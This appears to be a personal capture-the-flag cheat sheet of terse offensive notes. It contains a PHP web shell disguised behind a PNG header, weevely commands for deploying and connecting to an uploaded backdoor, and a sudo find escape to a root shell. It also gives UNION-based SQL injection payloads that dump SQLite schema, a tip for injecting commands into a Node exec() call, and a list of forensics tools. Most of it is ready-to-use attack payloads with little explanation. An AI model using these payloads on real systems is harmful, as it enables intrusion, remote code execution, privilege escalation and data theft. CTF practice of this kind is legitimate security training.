trickster:
=====================================================================================================
PNG
<?php system($_GET['cmd']) ;?>
reverse shell
====================================================================================================
using weevely 
python3.12 /usr/bin/weevely passwd shell.php 
python3.12 /usr/bin/weevely http://website.com:port/uploads/shell.php passwd

sudo -u root ls /root
check sudo -l 
if find is available use arbitrary code like this : sudo find . -exec /bin/sh \;
=====================================================================================================
php server 
php -S localhost:8080

└─$ weevely generate 123 payload.php  
weevely terminal http//:localhost/payload.php
============================================================================================
sql injection 
===========================================================================================
Algiers' UNION SELECT 1,2,3 -- - ( know how many columns
Algiers' UNION SELECT 1,2,tbl_name from sqlite_master -- -
or 
Algiers' UNION SELECT 1,2,GROUP_CONCAT(tbl_name) from sqlite_master -- -
know the system tables from here ==>( https://www.techonthenet.com/sqlite/sys_tables/index.php)
Algiers' UNION SELECT 1,2,name from PRAGMA_table_info('more_table') -- -          get the table columns 
Algiers' UNION SELECT 1,2,SQL  from sqlite_master -- - GET THE CREATE DATA BASE FULL SQL !!
=========================================================================================
for jwt , use jwt.io or this if that didnt work:https://10015.io/tools/jwt-encoder-decoder
===========================================================================================
fornsics: 
commands so far :
binwalk
foremost
xxd
file 
exiftool
gem install zsteg
then run zsteg -a file.png 
=============================================================================================================
caas :
look for spaces then escape with; like this segment  exec(`/usr/games/cowsay ${req.params.message}`, {timeout: 5000}, (error, stdout) 
then put your command
================================================================================================================


